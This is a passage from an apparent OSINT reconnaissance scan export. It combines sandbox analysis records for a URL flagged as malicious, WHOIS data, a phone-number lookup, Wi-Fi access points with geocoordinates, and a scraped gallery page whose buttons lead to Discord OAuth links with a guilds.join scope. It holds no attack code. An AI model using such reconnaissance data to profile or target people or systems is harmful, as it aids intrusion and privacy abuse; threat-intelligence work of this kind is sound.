Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003516]\n "80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE" has type "data"- Location: 
[%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE]- [targetUID: 00000000-00003516]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003516]\n "~DF4BEE67FCFB6399A9.TMP" has type "data"- Location: [%TEMP%\\~DF4BEE67FCFB6399A9.TMP]- [targetUID: 00000000-00003516]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003516]\n "872UMPTE.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\872UMPTE.txt]- [targetUID: 00000000-00003516]\n "bullet_1_" has type "PNG image data 15 x 15 8-bit colormap non-interlaced"- [targetUID: N/A]\n "~DF2DD02FB8845D7E5E.TMP" has type "data"- Location: [%TEMP%\\~DF2DD02FB8845D7E5E.TMP]- [targetUID: 00000000-00003516]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://keyzstoreoracle.org/"\n Pattern match: "http://keyzstoreoracle.org"\n Heuristic match: "keyzstoreoracle.org"\n Pattern match: 
"https://www.msn.com/spartan/ientpgbconfig?locale=en-us&market=us"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"HTTP/1.1 302 Moved Temporarily\nContent-Length: 0\nServer: Kestrel\nLocation: https://www.msn.com/spartan/ientpgbconfig?locale=en-us&market=us\nRequest-Context: appId=cid-v1:26ef1154-5995-4d24-ad78-ef0b04f11587\nX-Response-Cache-Status: True\nExpires: Sat, 15 Oct 2022 06:47:48 GMT\nCache-Control: max-age=0, no-cache, no-store\nPragma: no-cache\nDate: Sat, 15 Oct 2022 06:47:48 GMT\nConnection: keep-alive\nStrict-Transport-Security: max-age=31536000 ; includeSubDomains"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-22', u'name': u'Uses a User Agent typical for browsers, although no browser was ever launched', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found user agent(s): Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-6', u'name': u'Found an IP/URL artifact that was identified as malicious by at least three reputation engines', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 12, u'description': u'16/88 reputation engines marked "http://keyzstoreoracle.org/" as malicious (18% detection rate)\n 16/88 reputation engines marked "http://keyzstoreoracle.org" as malicious (18% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', 
u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'16/88 Antivirus vendors marked sample as malicious (18% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-3', u'name': u'Sample was identified as malicious by a large number of Antivirus engines', u'attck_ | 104.196.30.220 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | logitec-a197d9 (Net ID: 00:01:8E:A1:97:D8) | 37.7813933,-122.3918002 |
| 2023-05-12 03:01:28 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.19): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:03:41 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 01039402468.github.io |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | TSMD 5 (Net ID: 00:02:6F:FD:8B:6F) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:32:21 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.11:8443 | 188.114.97.0/24 |
| 2023-05-12 03:01:31 | Raw Data from RIRs | No | Tool - WhatWeb | 1 | 0 | 2 | 0 | None | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://funny.battleb0t.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'UNITED STATES'], u'module': [u'US']}, u'HTTPServer': {u'string': [u'Netlify']}, u'RedirectLocation': {u'string': [u'https://funny.battleb0t.xyz/']}, u'UncommonHeaders': {u'string': [u'x-nf-request-id']}, u'IP': {u'string': [u'34.148.147.18']}}}, {}] | funny.battleb0t.xyz |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-cache: MISS | {"content-length": "103646", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-63a06\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-ewr18167-EWR", "x-cache": "MISS", "x-github-request-id": "70D2:0CB6:1A723F4:28AE86F:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "4232179a2468cad7d8e788f0a4fe958396bfc091", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.050131,VS0,VE21", "server": "GitHub.com", "connection": "keep-alive", "content-type": "application/javascript; charset=utf-8"} |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNet4862 (Net ID: 00:01:36:5B:48:60) | 37.7813933,-122.3918002 |
| 2023-05-12 03:09:30 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | akashpmani.github.io |
| 2023-05-12 03:15:35 | Web Content Language | No | Language Detector | 0 | 0 | 3 | 0 | None | English | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:12:55 | Raw Data from RIRs | No | numverify | 0 | 0 | 3 | 0 | None | {u'international_format': u'+14806242598', u'local_format': u'4806242598', u'number': u'14806242598', u'valid': True, u'line_type': u'landline', u'location': u'Phoenix', u'country_code': u'US', u'carrier': u'', u'country_name': u'United States of America', u'country_prefix': u'+1'} | +14806242598 |
| 2023-05-12 03:24:30 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 7 | 0 | None | Network Solutions, LLC | Domain Name: ONDIGITALOCEAN.COM
Registry Domain ID: 2280019987_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2023-04-28T07:40:26Z
Creation Date: 2018-06-27T20:51:35Z
Registry Expiry Date: 2024-06-27T20:51:35Z
Registrar: Network Solutions, LLC
Registrar IANA ID: 2
Registrar Abuse Contact Email: abuse@web.com
Registrar Abuse Contact Phone: +1.8003337680
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: KIM.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: ONDIGITALOCEAN.COM
Registry Domain ID: 2280019987_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2023-04-28T07:41:04Z
Creation Date: 2018-06-27T20:51:35Z
Registrar Registration Expiration Date: 2024-06-27T04:00:00Z
Registrar: Network Solutions, LLC
Registrar IANA ID: 2
Reseller:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: PERFECT PRIVACY, LLC
Registrant Organization:
Registrant Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Registrant City: Jacksonville
Registrant State/Province: FL
Registrant Postal Code: 32256
Registrant Country: US
Registrant Phone: +1.5707088622
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: c26pf75p2tc@networksolutionsprivateregistration.com
Registry Admin ID:
Admin Name: PERFECT PRIVACY, LLC
Admin Organization:
Admin Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Admin City: Jacksonville
Admin State/Province: FL
Admin Postal Code: 32256
Admin Country: US
Admin Phone: +1.5707088622
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: c26pf75p2tc@networksolutionsprivateregistration.com
Registry Tech ID:
Tech Name: PERFECT PRIVACY, LLC
Tech Organization:
Tech Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Tech City: Jacksonville
Tech State/Province: FL
Tech Postal Code: 32256
Tech Country: US
Tech Phone: +1.5707088622
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: c26pf75p2tc@networksolutionsprivateregistration.com
Name Server: KIM.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Registrar Abuse Contact Email: domain.operations@web.com
Registrar Abuse Contact Phone: +1.8777228662
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:15Z <<<
For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en
This listing is a Network Solutions Private Registration. Mail
correspondence to this address must be sent via USPS Express Mail(TM) or
USPS Certified Mail(R); all other mail will not be processed. Be sure to
include the registrant's domain name in the address.
The data in Networksolutions.com's WHOIS database is provided to you by
Networksolutions.com for information purposes only, that is, to assist you in
obtaining information about or related to a domain name registration
record. Networksolutions.com makes this information available "as is," and
does not guarantee its accuracy. By submitting a WHOIS query, you
agree that you will use this data only for lawful purposes and that,
under no circumstances will you use this data to: (1) allow, enable,
or otherwise support the transmission of mass unsolicited, commercial
advertising or solicitations via direct mail, electronic mail, or by
telephone; or (2) enable high volume, automated, electronic processes
that apply to Networksolutions.com (or its systems). The compilation,
repackaging, dissemination or other use of this data is expressly
prohibited without the prior written consent of Networksolutions.com.
Networksolutions.com reserves the right to modify these terms at any time.
By submitting this query, you agree to abide by these terms.
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
|
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:0C:41:A1:42:A6) | 39.0469, -77.4903 |
| 2023-05-12 02:58:21 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://hui-zhou.netlify.app/index.webmanifest', u'signatures': [{u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /index.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: hui-zhou.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /index.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: hui-zhou.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: hui-zhou.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: hui-zhou.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', 
u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_638_ConnHashTable<1592>_HashTable_Mutex"\n "IsoScope_638_IESQMMUTEX_0_303"\n "IsoScope_638_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_638_IESQMMUTEX_0_331"\n "Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_638_IE_EarlyTabStart_0xf34_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1592"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_638_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\_!SHMSFTHISTORY!_"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.74.170.74:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': 
u'Dropped file: "TCKAJPB5.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TCKAJPB5.txt]- [targetUID: 00000000-00001592]\n Dropped file: "36ZSW8Z3.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\36ZSW8Z3.txt]- [targetUID: 00000000-00001592]\n Dropped file: "MRKVEKYP.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\MRKVEKYP.txt]- [targetUID: 00000000-00001592]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "~DFA8153985C10DD229.TMP" has type "data"- Location: [%TEMP%\\~DFA8153985C10DD229.TMP]- [targetUID: 00000000-00001592]\n "~DF0435E689B517C6FA.TMP" has type "data"- Location: [%TEMP%\\~DF0435E689B517C6FA.TMP]- [targetUID: 00000000-00001592]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "TCKAJPB5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TCKAJPB5.txt]- [targetUID: 00000000-00001592]\n "_A8449244-8194-11ED-8425-080027616BD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_D7364101-8192-11ED-8425-080027616BD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "36ZSW8Z3.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\36ZSW8Z3.txt]- [targetUID: 00000000-00001592]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFD5A898F84D577C98.TMP" has type "data"- Location: [%TEMP%\\~DFD5A898F84D577C98.TMP]- [targetUID: 00000000-00001592]\n "en-US.4" 
has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00001592]\n "~DF4601B0A7A8A27A0A.TMP" has type "data"- Location: [%TEMP%\\~DF4601B0A7A8A27A0A.TMP]- [targetUID: 00000000-00001592]\n "MRKVEKYP.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\MRKVEKYP.txt]- [targetUID: 00000000-00001592]\n "index_1_.webmanifest" has type "JSON data"- [targetUID: N/A]\n "RecoveryStore._D73640FF-8192-11ED-8425-080027616BD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /index.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: hui-zhou.netlify.app\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.1 200 OK\nAccept-Ranges: bytes\nAge: 0\nCache-Control: public, max-age=0, must-revalidate\nContent-Length: 548\nContent-Type: application/octet-stream\nDate: Thu, 22 Dec 2022 01:42:19 GMT\nEtag: "4ee59b3d2e9da012cec25867fea8b48f-ssl"\nServer: Netlify\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload\nX-Nf-Request-Id: 01GMVQXQJ1YFJJ3B3XD9AQHCH0\n\n{\n "name": "Job Candidate",\n "short_name": "Job Candidate",\n "lang": "en-us",\n "theme_color": "#2962ff",\n 
"background_color": "#2962ff",\n "icons": [{\n "src": "/images/icon_hu0b7a4cb9992c9ac0e91bd28ffd38dd00_9727_192x192_fill_lanczos_center_2.png",\n "sizes": "192x192",\n "type": "image/png"\n }, {\n "src": "/images/icon_hu0b7a4cb9992c9ac0e91bd28ffd38dd00_9727_512x512_fill_lanczos_center_2.png",\n "sizes": "512x512",\n "type": "image/png"\n }],\n "display": "standalone",\n "start_url": "/?utm_source=web_app_manifest"\n}"\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: hui-zhou.netlify.app\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.1 404 Not Found\nAge: 0\nCache-Control: public, max-age=0, must-revalidate\nContent-Encoding: gzip\nContent-Type: text/html; charset=utf-8\nDate: Thu, 22 Dec 2022 01:42:22 GMT\nEtag: 1655429792-ssl-df\nServer: Netlify\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload\nVary: Accept-Encoding\nX-Nf-Request-Id: 01GMVQXTEARV5HP7YS58XJPHJZ\nTransfer-Encoding: chunked"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://hui-zhou.netlify.app/index.webmanifest"\n Pattern match: "https://hui-zhou.netlify.app"'}], u'threat_level': 0, u'size': None, u'job_id': u'63a3b3d1ddf29718d50a1530', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'suspicious_identifiers': [], u'attck_id': u'T1071.001', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, 
